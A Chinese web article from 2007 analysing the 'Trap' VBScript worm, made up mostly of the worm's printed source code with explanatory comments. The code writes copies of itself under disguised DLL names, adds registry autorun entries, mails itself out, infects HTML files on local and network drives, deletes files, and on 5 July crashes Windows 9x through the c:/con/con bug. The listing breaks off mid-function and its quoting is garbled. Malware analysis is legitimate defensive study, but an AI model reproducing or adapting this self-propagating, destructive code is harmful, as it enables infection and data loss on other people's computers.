“陷阱”病毒源代码大揭密
2007-11-27 17:55:42 来源:WEB开发网本人非常不幸也遭遇“陷阱”的袭击,造成7月5日计算机蓝屏,于是我研究了“陷阱”的源代码,经过一番努力终于揭清了代码原理,下面就对“陷阱”的发作过程和源代码作详细的揭密。
病毒具有自身加密能力(使用 JavaScript 编码技术),使得普通用户无法看到病毒原码,但在被感染 VBS 文件中并没有加密,于是作为一个入口点,我非常轻松地得到所有源码。
@ thank you! make use of other person to get rid of an enemy, trap _2001
这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”
on error resume next
dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim whb(smailc) ’白宫相关人员邮件名单
whb(0) = president@whitehouse.gov
whb(1) = vice.president@whitehouse.gov
whb(2) = first.lady@whitehouse.gov
whb(3) = mrs.cheney@whitehouse.gov
发送邮件的主題
title(0) = Thanks for helping me!
title(1) = The police are investigating the robbery
title(2) = an application for a job
title(3) = The aspects of an application process pertinent to OSI
title(4) = What a pleasant weather. Why not go out for a walk?
title(5) = These countries have gone / been through too many wars
title(6) = Weve fixed on the 17th of April for the wedding
title(7) = The wind failed and the sea returned to calmness.
title(8) = the sitting is open!
title(9) =
defpath = C:\Readme.html 病毒文件
MAX_SIZE = 100000 定义传染文件的最大尺寸
MSWKEY = HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\
HCUW = HKEY_CURRENT_USER\Software\Microsoft\WAB\
main
sub main() 主程序
on error resume next
dim w_s
w_s= WScript.ScriptFullName 得到病毒文件本身的路径
if w_s = then
Err.Clear
set fso = CreateObject(Scripting.FileSystemObject) 创建文件系统对象
if getErr then 辨认病毒状态
Randomize 初始化隨机种子
ra = int(rnd() * 7) 产生隨机数
doucment.write title(ra) 写隨机内容
ExecuteMail 执行邮件状态时的程序
else
ExecutePage 执行 WEB 页状态时的程序
end if
else
ExecuteVbs 执行 VBS 文件状态时的程序
end if
end sub
Function getErr() 忽略错误
if Err.number<>0 then
getErr=true
Err.Clear
else
getErr=false
end if
end function
sub ExecutePage() WEB 页状态时的程序
on error resume next
dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf
Vbs_Str = GetScriptCode(vbscript) 得到 VBScript 代码
Js_Str = GetJavaScript() 得到 Javascript 代码
Code_Str = MakeScript(encrypt(Vbs_str),true) 得到已加密过的脚本代码
Html_Str = MakeHtml(encrypt(Vbs_str), true) 得到已加密的完整HTML代码
Gf
定义病毒文件的路径
wdsf = w2 & Mdm.vbs
wdsf2 = w1 & Profile.vbs
wdf = w2 & user.dll 注意 wdf 和 wdf3 两个文件非常迷惑人
wdf2 = w2 & Readme.html
wdf3 = w2 & system.dll
创建病毒文件
set vf = fso.OpenTextFile (wdf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile (wdf3, 2, true)
vf.write Code_Str
vf.close
修改注册表,让病毒文件在每一次计算机启动自动执行
Writereg MSWKEY & CurrentVersion\Run\Mdm, wdsf,
Writereg MSWKEY & CurrentVersion\RunServices\Profile, wdsf2,
SendMail 执行发送邮件程序
Hackpage 执行感染网站程序
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then 遍历所有本地硬盘和网络共享硬盘
call SearchHTML(x & \) 执行文件感染程序
end if
next
if TestUser then 检查用戶
Killhe 执行删除文件操作
else
if Month(Date) & Day(Date) = 75 then 如系统时间为 7月5日
set vf = fso.OpenTextFile(w2 & 75.htm, 2,true) ’创建系统攻击文件
vf.write MakeScript (window.navigate (c:/con/con);, false)
vf.close
Writereg MSWKEY & CurrentVersion\Run\75, w2 & 75.htm, 自动启动
window.navigate c:/con/con 立刻蓝屏,利用 Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)
else 如不是7.5
if fso.FileExists(w2 & 75.htm) then fso.DeleteFile w2 & 75.htm 删除75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath 删除 C:\Readme.html 病毒文件
end sub
sub ExecuteMail() 邮件状态时执行的程序
on error resume next
Vbs_Str = GetScriptCode(vbscript)
Js_Str = GetJavaScript()
Set Stl = CreateObject(Scriptlet.TypeLib) 创建 TypeLib对象
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() 创建 C:\Readme.html 文件
end with
window.open defpath, trap, width=1 height=1 menubar=no scrollbars=no toolbar=no 打开会隐藏的窗口
end sub
sub ExecuteVbs() 同理,如病毒文件是 VBS 时所执行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject(Scripting.FileSystemObject)
set wvbs = CreateObject(WScript.Shell)
Gf
wvbs.RegWrite MSWKEY & Windows Scripting Host\Setings\Timeout, 0, REG_DWORD
set vf = fso.OpenTextFile (w2 & system.dll, 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & \)
end if
next
if TestUser then Killhe
end sub
sub Gf() 得到系统路径
w1=fso.GetSpecialFolder(0) & \
w2=fso.GetSpecialFolder(1) & \
end sub
function Readreg(key_str) 读注册表
set tmps = CreateObject(WScript.Shell)
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) 写注册表
set tmps = CreateObject(WScript.Shell)
if vtype= then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) 创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml=< & HTML>< & HEAD>< & TITLE> & title(ra) & </ & TITLE>< & /HEAD> & _
<BO & AD> & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _
< & /BOAD>< & /HTML>
end Function
function MakeScript(Codestr, iHTML) 此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = document.write(<+ & SCRIPT Language=JavaScr
赞助商链接